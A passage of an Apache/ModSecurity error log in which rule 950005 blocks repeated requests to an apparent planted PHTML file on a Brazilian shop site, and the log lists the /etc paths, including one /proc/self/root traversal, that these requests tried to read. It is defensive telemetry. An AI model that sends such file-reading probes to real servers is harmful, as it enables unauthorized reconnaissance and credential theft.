"abwi6Pu8EFLIOrSqIpu7iwAAAlY"]
[Thu Mar 19 13:23:04.497961 2026] [:error] [pid 15826:tid 140411708356352] [client 57.141.18.53:50488] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi6OoXxyEfFpUF8f8gCgAAAUQ"]
[Thu Mar 19 13:23:05.125352 2026] [:error] [pid 17887:tid 140411548894976] [client 57.141.18.49:50498] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pkcs11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi6QkwaGbbGflqUZDa3QAAANc"]
[Thu Mar 19 13:23:05.336319 2026] [:error] [pid 27293:tid 140411666392832] [client 57.141.18.18:50504] [client 57.141.18.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi6f-YZRR_7pZ7nDKexAAAA8k"]
[Thu Mar 19 13:23:05.618120 2026] [:error] [pid 15826:tid 140411733534464] [client 57.141.18.53:50512] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi6eoXxyEfFpUF8f8gDAAAAUE"]
[Thu Mar 19 13:23:05.977211 2026] [:error] [pid 26799:tid 140411574073088] [client 57.141.18.44:50522] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi6da6ubjKNq_cu4Zp2wAAA1Q"]
[Thu Mar 19 13:23:06.503171 2026] [:error] [pid 27293:tid 140411674785536] [client 74.7.243.128:35256] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwi6v-YZRR_7pZ7nDKexgAAA8g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 13:23:06.521599 2026] [:error] [pid 27293:tid 140411616036608] [client 57.141.18.64:50530] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi6v-YZRR_7pZ7nDKexwAAA88"]
[Thu Mar 19 13:23:06.615965 2026] [:error] [pid 31803:tid 140411725141760] [client 57.141.18.35:50534] [client 57.141.18.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi6uyqAr6etmhZHNpy-wAAAEI"]
[Thu Mar 19 13:23:07.531836 2026] [:error] [pid 26799:tid 140411708356352] [client 57.141.18.78:50548] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi69a6ubjKNq_cu4Zp3AAAA0Q"]
[Thu Mar 19 13:23:08.134349 2026] [:error] [pid 17887:tid 140411683178240] [client 57.141.18.51:50568] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi7AkwaGbbGflqUZDa4QAAAMc"]
[Thu Mar 19 13:23:08.539773 2026] [:error] [pid 17653:tid 140411641214720] [client 57.141.18.26:50578] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi7Mdf6f5d65gmYZSMWwAAAsw"]
[Thu Mar 19 13:23:08.584571 2026] [:error] [pid 17653:tid 140411590858496] [client 57.141.18.54:50582] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi7Mdf6f5d65gmYZSMXAAAAtI"]
[Thu Mar 19 13:23:09.087142 2026] [:error] [pid 30077:tid 140411691570944] [client 57.141.18.90:50588] [client 57.141.18.90] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi7fu8EFLIOrSqIpu7jgAAAkY"]
[Thu Mar 19 13:23:09.384590 2026] [:error] [pid 26799:tid 140411599251200] [client 57.141.18.49:50594] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi7da6ubjKNq_cu4Zp3gAAA1E"]
[Thu Mar 19 13:23:09.890937 2026] [:error] [pid 31803:tid 140411565680384] [client 57.141.18.117:50606] [client 57.141.18.117] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi7eyqAr6etmhZHNpy_AAAAFU"]
[Thu Mar 19 13:23:10.067049 2026] [:error] [pid 17887:tid 140411540502272] [client 57.141.18.67:50608] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi7gkwaGbbGflqUZDa5AAAANg"]
[Thu Mar 19 13:23:10.096424 2026] [:error] [pid 17653:tid 140411725141760] [client 57.141.18.46:50610] [client 57.141.18.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/asound.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi7sdf6f5d65gmYZSMXQAAAsI"]
[Thu Mar 19 13:23:10.151654 2026] [:error] [pid 15826:tid 140411691570944] [client 57.141.18.67:50614] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi7uoXxyEfFpUF8f8gDgAAAUY"]
[Thu Mar 19 13:23:10.644452 2026] [:error] [pid 14269:tid 140411716749056] [client 57.141.18.91:50624] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi7gbLMZ6AikZjR9VwpAAAAAM"]
[Thu Mar 19 13:23:11.300028 2026] [:error] [pid 26799:tid 140411557287680] [client 57.141.18.50:50634] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi79a6ubjKNq_cu4Zp3wAAA1Y"]
[Thu Mar 19 13:23:12.941244 2026] [:error] [pid 27403:tid 140411716749056] [client 57.141.18.5:50638] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/exports"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi7xkFeYa1D6dYQnAEUAAAAcM"]
[Thu Mar 19 13:23:12.944641 2026] [:error] [pid 30077:tid 140411632822016] [client 57.141.18.55:50646] [client 57.141.18.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi8Pu8EFLIOrSqIpu7jwAAAk0"]
[Thu Mar 19 13:23:12.962954 2026] [:error] [pid 31803:tid 140411699963648] [client 57.141.18.18:50656] [client 57.141.18.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi8OyqAr6etmhZHNpy_gAAAEU"]
[Thu Mar 19 13:23:12.964039 2026] [:error] [pid 17653:tid 140411599251200] [client 57.141.18.33:50648] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.login"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi8Mdf6f5d65gmYZSMYQAAAtE"]
[Thu Mar 19 13:23:13.099979 2026] [:error] [pid 31803:tid 140411716749056] [client 57.141.18.70:50670] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi8eyqAr6etmhZHNpy_wAAAEM"]
[Thu Mar 19 13:23:13.391232 2026] [:error] [pid 31803:tid 140411674785536] [client 57.141.18.120:50676] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/logrotate.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi8eyqAr6etmhZHNpzAQAAAEg"]
[Thu Mar 19 13:23:13.883062 2026] [:error] [pid 31803:tid 140411632822016] [client 57.141.18.34:50684] [client 57.141.18.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi8eyqAr6etmhZHNpzAgAAAE0"]
[Thu Mar 19 13:23:13.965099 2026] [:error] [pid 15826:tid 140411548894976] [client 57.141.18.112:50686] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi8eoXxyEfFpUF8f8gDwAAAVc"]
[Thu Mar 19 13:23:14.231014 2026] [proxy_fcgi:error] [pid 17653:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:47944] AH01075: Error dispatching request to : (polling)
